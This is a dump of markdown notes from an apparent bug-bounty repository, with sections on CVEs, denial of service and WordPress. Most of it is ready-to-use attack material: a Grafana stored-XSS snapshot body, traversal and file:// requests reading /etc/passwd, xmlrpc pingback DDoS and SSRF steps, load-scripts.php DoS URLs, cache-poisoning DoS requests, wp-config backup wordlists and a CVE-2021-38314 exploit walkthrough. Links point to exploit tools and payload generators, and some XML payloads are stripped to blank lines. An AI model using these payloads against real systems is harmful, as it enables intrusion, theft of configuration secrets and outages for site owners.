https://brutelogic.com.br/blog/xss-filter-bypass-spell-checking/ 86 | 87 | 88 | -------------------------------------------------------------------------------- /CVES.md: -------------------------------------------------------------------------------- 1 | ## CVE-2020-11022/CVE-2020-11023 2 | 3 | https://vulnerabledoma.in/jquery_htmlPrefilter_xss.html 4 | 5 | ## CVE-2020-11110 6 | https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html 7 | 8 | * version : Grafana v6.2.5 9 | 10 | * authentication : v6.2.5 not required to be authenticated 11 | 12 | * send post request to /api/snapshots with the following json body 13 | ``` 14 | {"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0} 15 | ``` 16 | 17 | 18 | 19 | 20 | 21 | ## CVE-2021-24169 22 | WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS) 23 | 24 | ``` 25 | wp-admin/admin.php?page=wc-order-export&tab= 26 | ``` 27 | 28 | ## CVE-2021-40875 29 | Improper Access Control in Gurock TestRail versions ≤ 7.2.0.3014 results in sensitive file exposure 30 | 31 | * /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths. The corresponding file paths can be tested, and in some cases, result in the disclosure hardcoded credentials, API keys, or other sensitive data. 32 | 33 | 34 | ## CVE-2021-26084 35 | Remote Code Execution on Confluence Servers 36 | 37 | https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md 38 | 39 | ## CVE-2021–24563 Unauthenticated Stored XSS [Frontend Uploader <= 1.3.2] 40 | https://medium.com/pentesternepal/cve-2021-24563-unauthenticated-stored-xss-frontend-uploader-1-3-2-8522e0890833 41 | 42 | 43 | ## CVE-2021-38647 is an unauthenticated RCE vulnerability effecting the OMI agent as root. 44 | https://github.com/horizon3ai/CVE-2021-38647 45 | 46 | ## Metabase 敏感信息泄露 CVE-2021-41277 47 | ``` 48 | GET /api/geojson?url=file:/etc/passwd HTTP/1.1 49 | Host: 50 | ``` 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | ## Full Disclosed reports 60 | https://seclists.org/fulldisclosure/ 61 | 62 | 63 | 64 | 65 | ## CVE Finder 66 | https://git-cve.system00-sec.com/?cve=CVE-2021-1056 67 | 68 | ## RCE 0-day for GhostScript 9.50 - Payload generator 69 | https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50 70 | 71 | ## (CVE-2021-41765 | CVE-2021-41950 | CVE-2021-41951) 72 | https://www.horizon3.ai/multiple-vulnerabilities-in-resourcespace/ 73 | 74 | ## Tool that helps to embed a PostScript file into a PDF in a way that GhostScript will run the PostScript code during the PDF processing 75 | https://github.com/neex/ghostinthepdf 76 | 77 | ## CVE-2021-21234 Spring Boot Actuator Logview Directory Traversal 78 | https://pyn3rd.github.io/2021/10/25/CVE-2021-21234-Spring-Boot-Actuator-Logview-Directory-Traversal/ 79 | ``` 80 | http://localhost:8887/manage/log/view?filename=/etc/passwd&base=../../../../../ 81 | ``` 82 | 83 | 84 | ## CVE-2021-39316 WordPress Plugin DZS Zoomsounds 6.45 - Arbitrary File Read (Unauthenticated) 85 | https://cxsecurity.com/issue/WLB-2021120012 86 | ``` 87 | http://localhost/MYzoomsounds/?action=dzsap_download&link=../../../../../../../../../../etc/passwd 88 | ``` 89 | 90 | ## log4j 91 | https://github.com/0xInfection/LogMePwn 92 | https://github.com/adilsoybali/Log4j-RCE-Scanner 93 | 94 | 95 | ## 96 | https://sploitus.com/?query=cve#exploits 97 | 98 | 99 | 100 | -------------------------------------------------------------------------------- /DOS.md: -------------------------------------------------------------------------------- 1 | ## 1. denial of service with web cache poisoning 2 | ``` 3 | https://portswigger.net/research/responsible-denial-of-service-with-web-cache-poisoning 4 | ``` 5 | ## 2. DOS using 6 | ``` (((((()0))))) ``` 7 | 8 | ``` 9 | https://hackerone.com/reports/993582?__cf_chl_jschl_tk__=pmd_d4edfa2689d4773535bd4991c5ac1b735467eca6-1628409964-0-gqNtZGzNAeKjcnBszQ0O 10 | ``` 11 | 12 | ## 3. Overflow Trilogy ( HTTP Response Splitting with Header Overflow | Denial of Service with Cookie Bomb | DOM based Cookie Bomb ) 13 | https://blog.innerht.ml/overflow-trilogy/ 14 | 15 | 16 | 17 | ## 4. Cookie bomb 18 | 19 | ``` 20 | https://target.com/index.php?param1=xxxxxxxxxxxxxx 21 | ``` 22 | After input "xxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable 23 | 24 | ## 5. Try input a very long payload to form. For example using very long password or using very long email 25 | ``` 26 | POST /Register 27 | [...] 28 | 29 | username=victim&password=aaaaaaaaaaaaaaa 30 | ``` 31 | 32 | ## 6. Pixel flood, using image with a huge pixels 33 | 34 | Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/128/5f5a974e5f67ab7a11d2d92bd40f8997969f2f17/lottapixel.jpg?response-content-disposition=attachment%3B%20filename%3D%22lottapixel.jpg%22%3B%20filename%2A%3DUTF-8%27%27lottapixel.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQYFO7EZHL%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110133Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFIaCXVzLXdlc3QtMiJGMEQCIGgY3dUtffr4V%2BoxTJaFxc%2F7qjRodT3XLyN1ZLEF8%2FhfAiAXklx1Zvy3iKIGm1bocpDUP1cTx46eTbsDOKqRC93fgyq0AwhbEAEaDDAxMzYxOTI3NDg0OSIMH9s8JiCh%2B%2FNADeibKpEDocuqfbmxkM5H5iKsA3K4RuwcxVT9ORLJrjJO%2FILAm%2BcNsQXTgId%2Bpw1KOLkbFKrq0BQIC6459JtfWqHPXvDC7ZJGboQ%2FXE0F%2BAZQa6jaEyldrkKuDewNy5jy3VX1gquS%2BWrGl%2BGhwmXB4cg1jgOugGUsC%2FxD%2BcragIJAtGA7lp3YdcL%2FiQbnvuzmLP8w%2FyCHPUrpOw94bPOk8fpetOJoLmDfXZdL3hLGBEUGS7dSOoyebLSXGZDctkSpnXCq383lWYWYn0LSv1ooVvuCVzgxE%2BZi4b4QvLjjMG3FJdEX%2BDYmnDvnSrRoDtyj8bD3cP3xbZ3jaNYRbIlQTm2zR1DgoaDGE74FmpZWHcyC8zK0V6AKG6OzkcIaGRnGdDNSpZkN0DrWE7uY6BLiIGY16rflYOaElnbxijoMNDsU3MZH8gGk7crYJ%2FCeHeayInPBDgiREBgn7orAIjOY3xg8vzwKO96a90LmkK7wk977TbKfLIng1iNP9EMKYDjGePdBYDML9zBeqhO5LrVH%2BfbwzG5GXi0w5fnn%2BgU67AFRBwMChVRr%2FLW4j0PqpXUeN5ysVIuagoqSwqOhfwI9rtk56zTuGhO3du4raY5SOQ9vSkRdYHhga%2BW7oQTByD1ISiSaOjHs1s%2FrNfvIfMA8r0drPSykOdCuV2A5NhBpEPpT%2BuOosogdPihcORhO3hbcQJ9y4uxBsaBSJr%2F8S2CGjwZw7SOGmNaNFsPu%2BMRbYDA%2FH2eUMBl96w6KpUuNAXEPUcfq3weRMP1vXW62S4OyniYJ6DEVRkkE4eFZMUqy4c94uwSAegK54Po0V0sPM%2FncTESCgBf7Qe2zZlPhdRGZR%2F25cF6JTH0t2VIRQw%3D%3D&X-Amz-Signature=a837cb6b26bf437fa5008695310a21788918081c36e745d286c5cba9fd4a78e0) 35 | 36 | ## 7.Frame flood, using GIF with a huge frame 37 | 38 | Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/136/902000ac102f14a36a4d83ed9b5c293017b77fc7/uber.gif?response-content-disposition=attachment%3B%20filename%3D%22uber.gif%22%3B%20filename%2A%3DUTF-8%27%27uber.gif&response-content-type=image%2Fgif&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQ245MJJPA%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110848Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFMaCXVzLXdlc3QtMiJHMEUCIEC768ifpRHeEUucuNuVL%2FdcSsWMnGeNp%2FMhKs6afB01AiEAiZOP%2FwMaeQMITUni3aFcACIOqOHnWHgLKuXHRrb5LooqtAMIXBABGgwwMTM2MTkyNzQ4NDkiDHHy9PJ2ccl9cmsvyCqRA6bliBHBMPXR6NYflM%2BCXCCQ5VLdPCATpmLs9DhVuYsjxR3JUtVHnBvtfEYYWDWWsLoC3xuzmug5ycrAvqK%2BTYDYO7l4HD1rXfyEBkR579ZlUFab6bOL4i8nDqblun%2FeV253Sgd6GzL4E%2FXmUN%2FC6qNydSd9hp2fLoyNjqob6o5zJjmnqvZsq50ROOZwf1idkDtr163qeVZERnan7aY9rM%2FsX4iVdE4wY0rLw1maGRuDF2aLVCxPB681htsHt%2FpoZ18QY7LjcbNjbjB4PgXLd1sm5zQ4q9mPVxTZPvzo9BJCh7l6kMLHCtJXOXfrvvN8UBgIqr1KXvodzv7FRQYcvEpfw4pwCTWzBs8VeEcwS9gjOXFMNLNI8SZ9V76VQ5KrOIpKhzM9UQQN3DVzY3SwMHydX%2B%2BYcQTt%2FjvqTkorsltqob2g5E1K0U8btRLBvBqOo0Vbr75zLcLUUomDBQzSNSvJgTN43huYmkZxBpWAAId72Tt6m56aFQLXkCKGSoMxYjrrVW9jc37pVl3lZU7FIX0AMIuN6PoFOusBpDCrjFwR1Y7t7W8wLapYjI6yOkkvWTFwWvx38jZl9okqo5xchKolmKxKX7cfGPIyuUmSXc1xa0nKwYeOYlhQZfyI0NobqyWW81ITuuUjsBxULuqrXqfVl0PTjTTpqe%2FHvU6wYSE358XfggtcqaH9PPgNDOejgv%2FLnh9AH9nyqIWuaCu865IfAOupVVzFzQilyB2LDyQtTS4Kp5dHyEAibRQlqeKHWOkUE2mQefAaTxKLRKrs0mJQYSuC%2B4LQEB3Cq9Nhj5HN%2BYT7A7CDLrvyChyfYXQZYr0lR1jN91Yd7SBe2jB1Qls%2Bx%2FEUlQ%3D%3D&X-Amz-Signature=910a3812cf3b69f6fa72f39a89a6df2f395f8d17ef8702eeb164a0477c64fff5) 39 | 40 | ## 8. Sometimes in website we found a parameter that can adjust the size of the image, for example 41 | ``` 42 | https://target.com/img/vulnerable.jpg?width=500&height=500 43 | ``` 44 | Try change "500" to "99999999999" 45 | ``` 46 | https://target.com/img/vulnerable.jpg?width=99999999999&height=99999999999 47 | ``` 48 | 49 | ## 9. Try changing the value of the header with something new, for example: 50 | ``` 51 | Accept-Encoding: gzip, gzip, deflate, br, br 52 | ``` 53 | 54 | ## 10. Sometimes if you try bug "No rate limit", after a long try it. The server will go down because there is so much requests 55 | 56 | ## 11. ReDoS (Regex DoS) occurs due to poorly implemented RegEx 57 | 58 | ## 12. CPDoS ([Cache Poisoned Denial of Service](https://cpdos.org/)) 59 | - HTTP Header Oversize (HHO) 60 | 61 | A malicious client sends an HTTP GET request including a header larger than the size supported by the origin server but smaller than the size supported by the cache 62 | ``` 63 | GET /index.html HTTP/1.1 64 | Host: victim.com 65 | X-Oversized-Header-1: Big_Value 66 | ``` 67 | The response is 68 | ``` 69 | HTTP/1.1 400 Bad Request 70 | ... 71 | Header size exceeded 72 | ``` 73 | - HTTP Meta Character (HMC) 74 | 75 | this attack tries to bypass a cache with a request header containing a harmful meta character. Meta characters can be, e.g., control characters such as line break/carriage return (\n), line feed (\r) or bell (\a). 76 | 77 | ``` 78 | GET /index.html HTTP /1.1 79 | Host: victim.com 80 | X-Meta-Malicious-Header: \r\n 81 | ``` 82 | The response is 83 | ``` 84 | HTTP/1.1 400 Bad Request 85 | ... 86 | Character not allowed 87 | ``` 88 | - HTTP Method Override (HMO) 89 | 90 | There are several headers present in HTTP Standard that allow modifying overriding the original HTTP header. Some of these headers are: 91 | ``` 92 | 1. X-HTTP-Method-Override 93 | 2. X-HTTP-Method 94 | 3. X-Method-Override 95 | ``` 96 | The header instructs the application to override the HTTP method in request. 97 | ``` 98 | GET /index.php HTTP/1.1 99 | Host: victim.com 100 | X-HTTP-Method-Override: POST 101 | ``` 102 | The response is 103 | ``` 104 | HTTP/1.1 404 Not Found 105 | ... 106 | POST on /index.php not foudn 107 | ``` 108 | 109 | - X-Forwarded-Port 110 | ``` 111 | GET /index.php?dontpoisoneveryone=1 HTTP/1.1 112 | Host: www.hackerone.com 113 | X-Forwarded-Port: 123 114 | ``` 115 | 116 | - X-Forwarded-Host 117 | ``` 118 | GET /index.php?dontpoisoneveryone=1 HTTP/1.1 119 | Host: www.hackerone.com 120 | X-Forwarded-Host: www.hackerone.com:123 121 | ``` 122 | 123 | ![Response DoS](https://portswigger.net/cms/images/6f/83/45a1a9f841b9-article-screen_shot_2018-09-13_at_11.08.12.png) 124 | 125 | References: 126 | - [Hackerone #840598](https://hackerone.com/reports/840598) 127 | - [Hackerone #105363](https://hackerone.com/reports/105363) 128 | - [Hackerone #390](https://hackerone.com/reports/390) 129 | - [Hackerone #400](https://hackerone.com/reports/400) 130 | - [Hackerone #751904](https://hackerone.com/reports/751904) 131 | - [Hackerone #861170](https://hackerone.com/reports/861170) 132 | - [Hackerone #892615](https://hackerone.com/reports/892615) 133 | - [Hackerone #511381](https://hackerone.com/reports/511381) 134 | - [Hackerone #409370](https://hackerone.com/reports/409370) 135 | - [CPDoS](https://cpdos.org/) 136 | -------------------------------------------------------------------------------- /CMS/WordPress.md: -------------------------------------------------------------------------------- 1 | ## 1. Create database 2 | ``` 3 | /wp-admin with 403 status 4 | Bypass it using /wp-admin/setup-config.php?step=1 5 | This will allow you to create a database 6 | ``` 7 | 8 | ## 2. xmlrpc.php 9 | 10 | This is one of the common issue on wordpress. To get some bucks with this misconfiguration you must have to exploit it fully, and have to show the impact properly as well. 11 | 12 | ## Detection 13 | * visit site.com/xmlrpc.php 14 | * Get the error message about POST request only 15 | ## Exploit 16 | * Intercept the request and change the method GET to POST 17 | * List all Methods 18 | ``` 19 | 20 | system.listMethods 21 | 22 | 23 | ``` 24 | * Check the pingback.ping mentod is there or not 25 | * Perform DDOS 26 | ``` 27 | 28 | pingback.ping 29 | 30 | http://: 31 | http:// 32 | 33 | 34 | ``` 35 | * Perform SSRF (Internal PORT scan only) 36 | ``` 37 | 38 | pingback.ping 39 | 40 | http://: 41 | http:// 42 | 43 | 44 | ``` 45 | ## 3. WP User Enumeration 46 | This issue will only acceptable when target website is hiding their current users or they are not publically available. So attacker can use those user data for bruteforcing and other staff 47 | 48 | ## Detection 49 | * 50 | ``` 51 | visit site.com/wp-json/wp/v2/users/ 52 | ``` 53 | * 54 | ``` 55 | http://target.com/?author=1 56 | ``` 57 | * 58 | ``` 59 | http://target.com/?rest_route=/wp/v2/users 60 | ``` 61 | * You will see json data with user info in response 62 | 63 | ## 4. Denial of Service via load-scripts.php 64 | ``` 65 | http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wplink,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter 66 | ``` 67 | [h1 report](https://hackerone.com/reports/752010) 68 | 69 | ## 5. Denial of Service via load-styles.php 70 | ``` 71 | http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic 72 | ``` 73 | ## 6. Log files exposed 74 | ``` 75 | http://target.com/wp-content/debug.log 76 | ``` 77 | ## 7. Backup file wp-config exposed 78 | ``` 79 | .wp-config.php.swp 80 | wp-config.inc 81 | wp-config.old 82 | wp-config.txt 83 | wp-config.html 84 | wp-config.php.bak 85 | wp-config.php.dist 86 | wp-config.php.inc 87 | wp-config.php.old 88 | wp-config.php.save 89 | wp-config.php.swp 90 | wp-config.php.txt 91 | wp-config.php.zip 92 | wp-config.php.html 93 | wp-config.php~ 94 | ``` 95 | 96 | ## WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS) 97 | 98 | ``` 99 | wp-admin/admin.php?page=wc-order-export&tab= 100 | ``` 101 | 102 | ## Wordpress Plugin Update Confusion - The full guide how to scan and mitigate the next big Supply Chain Attack 103 | https://galnagli.com/Wordpress_Plugin_Update_Confusion/ 104 | 105 | ## Unauthenticated Sensitive Information Disclosure (CVE-2021–38314) 106 | ### Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress 107 | https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c 108 | 109 | ``` 110 | Proof of Concept: 111 | 1. Found subdomain blog.redacted.com is using wordpress, then try the CVE-2021–38314 112 | 2. Using this script 113 | $target = “https://blog.redacted.com"; 114 | $key1 = md5(“$target/-redux”); 115 | $key2 = file_get_contents(“$target/wp-admin/admin-ajax.php?action=$key1”); 116 | 3. It returns e24eb61b09bf2340779b35xxxxxxxxxx a hash of the auth_key_secret_key with “-redux” appended. 117 | 4. Append “-support” and md5 it again and thats the new function hook name. 118 | $key3 = md5($key2.’-support’); 119 | 5. Then get the hash 1505d4269113e1bda36c47xxxxxxxxxx 120 | 6. So what this code does is compare the code param with the output of https://verify.redux.io/?hash=1505d4269113e1bda36c47xxxxxxxxxx&site=http://blog.redacted.com/ 121 | $redux_code = b1mzZ3%2BU0p43TZ6%2F7QJaYU0hJMHgdcT5Bc%2Bnyo4t3xUenDRm0Ef8HipC7EMKSdtpw8g65XZjxxxxxxxxxxxxxxxxxxxx 122 | 7. Final URL https://blog.redacted.com/wp-admin/admin-ajax.php?action=1505d4269113e1bda36c47xxxxxxxxxx&code=b1mzZ3%2BU0p43TZ6%2F7QJaYU0hJMHgdcT5Bc%2Bnyo4t3xUenDRm0Ef8HipC7EMKSdtpw8g65XZjxxxxxxxxxxxxxxxxxxxx 123 | ``` 124 | 125 | 126 | ``` 127 | For WordPress wp-config file, if the main endpoint is forbidden we can also check for the backup file 128 | 129 | redacted[.]com/wp-config.php => 403 Forbidden 130 | 131 | redacted[.]com/wp-config.php_orig => 200 OK 132 | 133 | Also try: 134 | _new _old _orig _bkp _bak with dashes,fullstops and underscores 135 | ``` 136 | 137 | 138 | --------------------------------------------------------------------------------